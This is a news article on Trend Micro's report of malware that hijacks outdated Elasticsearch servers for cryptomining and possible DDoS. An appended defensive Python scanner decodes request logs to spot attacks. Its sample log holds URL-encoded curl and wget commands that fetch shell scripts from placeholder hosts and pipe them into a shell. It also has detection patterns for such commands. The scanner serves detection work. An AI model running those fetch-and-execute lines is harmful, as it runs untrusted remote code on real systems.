
An aggressive type of malware is threatening to undermine enterprise search engine Elasticsearch, turning it into a sophisticated zombie crypto-mining botnet.

The malware, described by cybersecurity company Trend Micro, spreads by attacking public-facing servers running outdated versions of the search engine software one after another, building a botnet that could also be used in distributed denial of service (DDoS) attacks.

According to the security researchers, most attacks of this kind are run for profit, even though the attacks themselves are “relatively straightforward” to execute.

“Much of the malicious traffic and many of the attacks that we see targeting Elasticsearch are relatively straightforward, and more often than not, profit-driven,” the Trend Micro post noted. “An attacker looks for unsecured or misconfigured servers or exploits old vulnerabilities, then drops the final payloads that typically consist of cryptocurrency-mining malware or even ransomware.”

The malware works by first identifying out-of-date servers, which it can then force to download and execute the offending scripts. According to Trend Micro, this is what sets the present malware apart from other, similar malicious scripts.

Worryingly, they suggest this also makes the hacks harder to detect.

“The ways that the scripts are retrieved are notable … Using expendable domains, for instance, allows the attackers to swap URLs as soon as they are detected,” researchers said.

According to Trend Micro, these elements of the malware should be seen as a “red flag” that could suggest much more substantial attacks are on the way:

That the cybercriminals (or threat actors) behind this attack used URL encoding, staged where the scripts are retrieved, and compromised legitimate websites could mean they are just testing their hacking tools or readying their infrastructure before mounting actual attacks.

If this turns out to be the case, the results could be devastating for the servers affected. By seizing control of the servers and using them to mine cryptocurrency, the hackers have a strong commercial incentive to pull off this type of attack.

Server administrators running Elasticsearch are being warned to patch their software without delay and to tighten their security settings to prevent this type of attack from taking hold.
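One defensive check that follows from the report's description (URL-encoded requests that make the server fetch and run a script from a disposable domain): the Python below, an added example that is not from the article or from Trend Micro, repeatedly percent-decodes each request log line, flags download-and-execute command patterns, and collects the script-hosting domains for blocking. The log format, hosts and IP addresses are constructed samples, not real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for an Elasticsearch front end (not real traffic).
# Hosts and IPs are placeholders; the last entry is double URL-encoded on purpose.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2024:10:01:02 +0000] "GET /_cat/indices HTTP/1.1" 200 512
203.0.113.7 - - [12/Dec/2024:10:01:09 +0000] "POST /_search?pretty HTTP/1.1" 200 88 "wget%20-q%20-O%20-%20http%3A%2F%2Fexample.invalid%2Fs.sh%20%7C%20sh"
198.51.100.9 - - [12/Dec/2024:10:01:11 +0000] "GET /logs-2024.12.12/_search HTTP/1.1" 200 2048
203.0.113.7 - - [12/Dec/2024:10:02:30 +0000] "POST /_search HTTP/1.1" 200 88 "curl%2520-fsSL%2520http%253A%252F%252Fcdn.example.invalid%252Fupdate.sh%257Cbash"
"""

DOWNLOADER = re.compile(r"\b(?:curl|wget)\b", re.IGNORECASE)
# A pipe into a shell, or an explicit `sh -c` / `bash -c`, after the download.
SHELL_EXEC = re.compile(r"\|\s*(?:ba)?sh\b|\b(?:ba)?sh\s+-c\b", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)

def fully_decode(text, max_rounds=3):
    """Percent-decode until stable, so staged/double encoding cannot hide the command."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line):
    """Return a finding dict for a download-and-execute request, else None."""
    decoded = fully_decode(line)
    if not (DOWNLOADER.search(decoded) and SHELL_EXEC.search(decoded)):
        return None
    return {
        "src": line.split()[0],               # client IP, first field of the log line
        "hosts": URL_HOST.findall(decoded),   # where the script is being fetched from
        "decoded": decoded,
    }

def scan_log(text):
    """Scan every line; return the findings in log order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]

def staging_hosts(findings):
    """Distinct script-hosting domains seen, for blocklists and threat-intel lookups."""
    return sorted({host for f in findings for host in f["hosts"]})

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['src']} -> {f['decoded']}")
    print("staging hosts:", staging_hosts(found))
```

Because the attackers swap hosting domains as soon as they are noticed, the decoded command pattern is the durable signal; the host list is only a short-lived blocklist input.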

But for some, these warnings will undoubtedly be heard too late.
